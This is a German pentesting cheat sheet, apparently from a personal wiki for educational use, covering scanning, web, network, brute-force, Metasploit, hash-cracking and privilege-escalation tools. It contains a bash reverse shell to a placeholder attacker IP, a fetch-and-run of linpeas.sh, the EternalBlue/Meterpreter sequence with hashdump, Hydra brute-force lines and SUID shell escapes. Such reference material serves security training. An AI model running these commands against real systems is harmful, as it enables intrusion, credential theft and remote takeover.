⚠️
Nur auf eigenen Systemen oder mit ausdrΓΌcklicher Genehmigung einsetzen. Unbefugter Einsatz ist strafbar.
πŸ” Recon

Reconnaissance & Scanning

πŸ—ΊοΈ
Nmap β€” Network Mapper β–Ά
● RECON

Der Standard-Port-Scanner. Findet offene Ports, erkennt laufende Dienste und deren Versionen, erkennt das Betriebssystem. Unverzichtbar am Anfang jedes Pentests.

# Schneller Scan der hΓ€ufigsten 1000 Ports
nmap 10.10.10.1

# Alle 65535 Ports scannen
nmap -p- 10.10.10.1

# Service-Version + OS-Detection + Scripts (Standard-Combo)
nmap -sV -sC -O 10.10.10.1

# Aggressiver Scan (alles auf einmal)
nmap -A -p- 10.10.10.1

# Schnell + alle Ports (fΓΌr CTFs)
nmap -sV -sC -p- --min-rate 5000 10.10.10.1

# UDP-Scan (langsamer, aber wichtig)
nmap -sU --top-ports 20 10.10.10.1

# Ergebnis in Datei speichern
nmap -sV -oN scan.txt 10.10.10.1
FlagBedeutung
-sVService-Versionen erkennen
-sCStandard-Scripts ausfΓΌhren
-OBetriebssystem erkennen
-AAlles: -sV -sC -O + Traceroute
-p-Alle 65535 Ports scannen
-sUUDP-Scan
-oNOutput als Textdatei speichern
--min-rateMindest-Paketrate (schneller Scan)
πŸ“‚
Gobuster β€” Directory & DNS Bruteforcer β–Ά
● RECON

Findet versteckte Verzeichnisse, Dateien und Subdomains per Wordlist-Brute-Force. Schneller und effizienter als manuelles Durchsuchen.

# Directory-Scan (hΓ€ufigste Nutzung)
gobuster dir -u https://example.com \
  -w /usr/share/wordlists/dirb/common.txt

# Mit Dateiendungen suchen (.php, .html, .txt)
gobuster dir -u https://example.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -x php,html,txt,bak

# Subdomain-Enumeration
gobuster dns -d example.com \
  -w /usr/share/wordlists/subdomains.txt

# Mit Auth-Header (fΓΌr geschΓΌtzte Bereiche)
gobuster dir -u https://example.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -H "Authorization: Bearer TOKEN"

# Schnellere Wordlist fΓΌr CTFs:
# /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

πŸ“ NΓΌtzliche Wordlists

  • /usr/share/wordlists/dirb/common.txt β€” schnell, fΓΌr den Anfang
  • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt β€” umfassend
  • SecLists (GitHub) β€” beste Sammlung ΓΌberhaupt
⚑
ffuf β€” Fast Web Fuzzer β–Ά
● RECON

Schnellster Web-Fuzzer. Kann Directories, Parameter, Header, Subdomains und vieles mehr fuzzen. Das FUZZ-Keyword wird durch Wordlist-EintrΓ€ge ersetzt.

# Directory Fuzzing
ffuf -w /usr/share/wordlists/dirb/common.txt \
  -u https://example.com/FUZZ

# Nur bestimmte HTTP-Codes anzeigen
ffuf -w wordlist.txt -u https://example.com/FUZZ -mc 200,301,302

# Parameter Fuzzing (GET)
ffuf -w wordlist.txt \
  -u "https://example.com/page?FUZZ=value" -mc 200

# Subdomains fuzzen
ffuf -w subdomains.txt \
  -u https://FUZZ.example.com -mc 200

# Ergebnisse nach Grâße filtern (false positives ausblenden)
ffuf -w wordlist.txt -u https://example.com/FUZZ -fs 1234
πŸ”¬
Nikto β€” Web Vulnerability Scanner β–Ά
● SCAN

Automatischer Web-Server-Scanner. PrΓΌft auf bekannte Schwachstellen, unsichere Konfigurationen, veraltete Software und gefΓ€hrliche Dateien. Laut, aber umfassend.

# Standard-Scan
nikto -h https://example.com

# Über Burp Suite proxyen (um Traffic zu sehen)
nikto -h https://example.com \
  -useproxy http://127.0.0.1:8080

# Output in Datei speichern
nikto -h https://example.com -o nikto_report.txt
🌐 Web

Web Security Tools

πŸ”€
Burp Suite β€” Web Application Proxy β–Ά
● ESSENTIELL

Das wichtigste Tool fΓΌr Web-Pentesting. Sitzt als Proxy zwischen Browser und Server, fΓ€ngt alle HTTP-Requests ab und ermΓΆglicht das Modifizieren, Wiederholen und automatische Testen von Anfragen. Community Edition ist kostenlos.

Wichtigste Module

ProxyHTTP-Traffic abfangen und modifizieren β€” Hauptarbeitsbereich
RepeaterEinzelne Requests beliebig oft wiederholen und anpassen
IntruderAutomatisierter Angriff mit Payloads (Bruteforce, Fuzzing)
DecoderBase64, URL-Encoding, HTML, SHA etc. en-/decodieren
ScannerAutomatische Schwachstellensuche (nur Pro-Version)
# Burp Suite starten (Kali)
burpsuite

# Proxy lÀuft standardmÀßig auf:
127.0.0.1:8080

# Browser-Proxy einstellen (Firefox):
# Einstellungen β†’ Netzwerk β†’ Proxy β†’ Manuell
# HTTP-Proxy: 127.0.0.1  Port: 8080

# Burp CA-Zertifikat installieren (fΓΌr HTTPS):
# http://burp β†’ CA Certificate herunterladen
# Firefox: Einstellungen β†’ Zertifikate β†’ Importieren

# Request an Repeater senden
Strg+R

# Request an Intruder senden
Strg+I

# URL-encode/decode
Strg+U

πŸ“ Workflow

  • Proxy aktivieren β†’ Seite im Browser aufrufen β†’ Traffic in Proxy-History analysieren
  • Interessanten Request β†’ Rechtsklick β†’ "Send to Repeater" β†’ modifizieren & senden
  • FoxyProxy (Firefox-Extension) empfohlen fΓΌr schnelles Proxy-Umschalten
πŸ’‰
sqlmap β€” SQL Injection Automation β–Ά
● EXPLOIT

Automatisierte Erkennung und Ausnutzung von SQL-Injection-Schwachstellen. Kann Datenbanken auslesen, Tabellen dumpen und in manchen FΓ€llen sogar Shell-Zugriff erlangen.

# URL auf SQLi testen
sqlmap -u "https://example.com/item?id=1"

# Alle Datenbanken auflisten
sqlmap -u "https://example.com/item?id=1" --dbs

# Tabellen einer Datenbank auflisten
sqlmap -u "https://example.com/item?id=1" \
  -D datenbankname --tables

# Tabelle dumpen (alle Daten)
sqlmap -u "https://example.com/item?id=1" \
  -D datenbankname -T users --dump

# POST-Request aus Burp Suite verwenden
sqlmap -r request.txt -p username --dbs

# Aggressiv + alle Techniken testen
sqlmap -u "https://example.com/item?id=1" --level=5 --risk=3
πŸ“‘ Netzwerk

Netzwerk Tools

πŸ”Œ
Ncat / Netcat β€” Netzwerk-Schweizer-Messer β–Ά
● ESSENTIELL

Ncat (Nmap-Version von Netcat) liest und schreibt Daten ΓΌber TCP/UDP-Verbindungen. Wird fΓΌr Reverse Shells, Bind Shells, Port-Listening und DateiΓΌbertragungen verwendet. Unersetzlich.

# Listener starten (auf eingehende Verbindung warten)
ncat -lvnp 4444

# Alternativ mit klassischem netcat
nc -lvnp 4444

# Verbindung zu einem Host aufbauen
ncat 10.10.10.1 4444

# Reverse Shell empfangen (auf Angreifer-Maschine):
ncat -lvnp 4444

# Reverse Shell senden (auf Opfer-Maschine, bash):
bash -i >& /dev/tcp/ANGREIFER-IP/4444 0>&1

# Datei ΓΌbertragen (EmpfΓ€nger):
ncat -lvnp 9999 > empfangene_datei.txt

# Datei ΓΌbertragen (Sender):
ncat 10.10.10.1 9999 < datei.txt

# Port-Check (ist Port offen?)
ncat -zv 10.10.10.1 80
FlagBedeutung
-lListen-Mode (auf Verbindung warten)
-vVerbose (mehr Output)
-nKein DNS-Lookup
-pPort angeben
-eProgramm nach Verbindung ausfΓΌhren (Bind Shell)
-zZero-I/O mode (Port-Check)
🦈
Wireshark β€” Netzwerk-Traffic Analyse β–Ά
● ANALYSE

Grafischer Netzwerk-Sniffer. Zeichnet Netzwerkpakete live auf und analysiert sie. Unverzichtbar fΓΌr Traffic-Analyse, Protokoll-Debugging und das Finden von Credentials in unverschlΓΌsseltem Traffic.

# Nur HTTP-Traffic anzeigen
http

# Traffic zu/von bestimmter IP
ip.addr == 10.10.10.1

# Nur TCP-Traffic auf Port 80
tcp.port == 80

# POST-Requests filtern (enthΓ€lt oft Credentials)
http.request.method == "POST"

# PasswΓΆrter in FTP/Telnet suchen
ftp
telnet

# Follow TCP Stream (kompletten Datenaustausch lesen)
# Rechtsklick auf Paket β†’ Follow β†’ TCP Stream

# Alternativ: tcpdump (CLI-Version)
tcpdump -i eth0 -w capture.pcap
tcpdump -r capture.pcap port 80
πŸ’₯ Exploit

Exploitation Tools

πŸ”¨
Hydra β€” Online Brute Forcer β–Ά
● HIGH

Schneller, parallelisierter Login-Bruteforcer. UnterstΓΌtzt ΓΌber 50 Protokolle: HTTP, SSH, FTP, SMB, RDP, MySQL, SMTP und mehr. Standard-Tool fΓΌr Credential-Angriffe.

# SSH Bruteforce
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  10.10.10.1 ssh

# HTTP POST Login Formular
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  example.com http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

# FTP Bruteforce
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  10.10.10.1 ftp

# Mehrere Benutzernamen aus Datei
hydra -L users.txt -P passwords.txt 10.10.10.1 ssh

# Schneller mit mehr Threads
hydra -l admin -P rockyou.txt -t 64 10.10.10.1 ssh
FlagBedeutung
-lEinzelner Benutzername
-LBenutzernamen aus Datei
-pEinzelnes Passwort
-PPasswΓΆrter aus Datei (Wordlist)
-tAnzahl paralleler Verbindungen (Standard: 16)
-sAnderen Port angeben
-VJeden Versuch anzeigen
🎯
Metasploit Framework β€” Exploitation Framework β–Ά
● CRITICAL POWER

Das bekannteste Exploitation-Framework. EnthΓ€lt tausende fertige Exploits, Payloads und Post-Exploitation-Module. FΓΌr CVE-basierte Angriffe, Shellcode-Generierung und Meterpreter-Sessions.

# Metasploit starten
msfconsole

# Nach Exploit suchen
msf6> search eternalblue
msf6> search type:exploit platform:windows smb

# Exploit auswΓ€hlen
msf6> use exploit/windows/smb/ms17_010_eternalblue

# Optionen anzeigen
msf6> show options

# Ziel-IP setzen
msf6> set RHOSTS 10.10.10.1

# Eigene IP setzen (fΓΌr Reverse Shell)
msf6> set LHOST 10.10.10.99

# Payload wΓ€hlen (Meterpreter empfohlen)
msf6> set payload windows/x64/meterpreter/reverse_tcp

# AusfΓΌhren
msf6> run

# System-Info anzeigen
meterpreter> sysinfo

# Aktuellen User anzeigen
meterpreter> getuid

# OS-Shell ΓΆffnen
meterpreter> shell

# Windows-Passwort-Hashes dumpen
meterpreter> hashdump

# Datei herunterladen
meterpreter> download datei.txt
πŸ”‘ PasswΓΆrter

Password Cracking

πŸ”“
Hashcat β€” GPU-basierter Hash Cracker β–Ά
● HIGH

Schnellster Passwort-Cracker der Welt β€” nutzt GPU-Beschleunigung. UnterstΓΌtzt ΓΌber 300 Hash-Typen (MD5, SHA1, bcrypt, NTLM, ...). Unverzichtbar wenn man Hash-Dumps aus einer Datenbank hat.

# MD5-Hash cracken (Wordlist-Angriff)
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

# SHA1-Hash
hashcat -m 100 -a 0 hash.txt rockyou.txt

# NTLM (Windows)
hashcat -m 1000 -a 0 hash.txt rockyou.txt

# bcrypt (langsam, aber mΓΆglich)
hashcat -m 3200 -a 0 hash.txt rockyou.txt

# Mit Regeln (PasswΓΆrter mutieren: password β†’ P@ssw0rd)
hashcat -m 0 -a 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Hash-Typ identifizieren (vorher)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'
β†’ MD5
-m WertHash-Typ
0MD5
100SHA1
1400SHA256
1000NTLM (Windows)
3200bcrypt
1800sha512crypt (Linux /etc/shadow)
22000WPA2 (WLAN)
πŸ—‘οΈ
John the Ripper β€” Vielseitiger Hash Cracker β–Ά
● HIGH

Klassischer Passwort-Cracker. Erkennt Hash-Typen automatisch, crack /etc/shadow-Dateien und viele andere Formate. Besonders praktisch fΓΌr Linux-Hashes und ZIP/PDF-PasswΓΆrter.

# Einfacher Crack (auto-erkennt Hash-Typ)
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# /etc/shadow cracken (passwd + shadow kombinieren)
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=rockyou.txt

# ZIP-Passwort cracken
zip2john protected.zip > zip_hash.txt
john zip_hash.txt --wordlist=rockyou.txt

# SSH-Key cracken
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=rockyou.txt

# Bereits gecrackte PasswΓΆrter anzeigen
john --show hash.txt
🏴 Post-Exploit

Post-Exploitation

πŸ”Ž
LinPEAS / WinPEAS β€” Privilege Escalation Scanner β–Ά
● POST-EXPLOIT

Automatische Suche nach Privilege Escalation Vektoren. LinPEAS fΓΌr Linux, WinPEAS fΓΌr Windows. PrΓΌft hunderte mΓΆgliche Wege um von normalem User zu Root/SYSTEM zu kommen.

# Direkt von GitHub ausfΓΌhren (auf Opfer-Maschine)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Oder: auf eigener Maschine hosten + auf Opfer laden
# [Angreifer] HTTP-Server starten:
python3 -m http.server 8080

# [Opfer] Datei herunterladen und ausfΓΌhren:
wget http://ANGREIFER-IP:8080/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh

# Output in Datei speichern
/tmp/linpeas.sh | tee /tmp/output.txt

πŸ“ Was LinPEAS prΓΌft

  • SUID/SGID-Binaries (oft Privilege Escalation mΓΆglich)
  • Sudo-Berechtigungen (sudo -l)
  • Cron-Jobs (beschreibbare Scripts die als Root laufen)
  • Schwache Dateirechte (/etc/passwd, /etc/shadow)
  • Credentials in Konfig-Dateien, Historys, Umgebungsvariablen
πŸ“–
GTFOBins & LOLBAS β€” Privilege Escalation Referenz β–Ά
● REFERENZ

Keine Tools, sondern Wissensdatenbanken. GTFOBins (Linux) und LOLBAS (Windows) listen auf, welche System-Binaries fΓΌr Privilege Escalation, Shell-Escapes und Dateioperationen missbraucht werden kΓΆnnen.

# SUID-Binaries auf dem System finden:
find / -perm -u=s -type f 2>/dev/null

# Beispiel: vim hat SUID-Bit gesetzt
# β†’ GTFOBins nachschlagen β†’ vim kann Shell spawnen:
vim -c ':!/bin/sh'
β†’ Root-Shell!

# Beispiel: find hat SUID-Bit
find . -exec /bin/sh \; -quit
β†’ Root-Shell!

πŸ”— Ressourcen

  • GTFOBins: gtfobins.github.io β€” Linux SUID / Sudo / Shell escape
  • LOLBAS: lolbas-project.github.io β€” Windows Living off the Land
  • HackTricks: book.hacktricks.xyz β€” umfassendes Pentest-Wiki

// wiki.simonwied.com Β· CyberTools Β· FΓΌr Bildungszwecke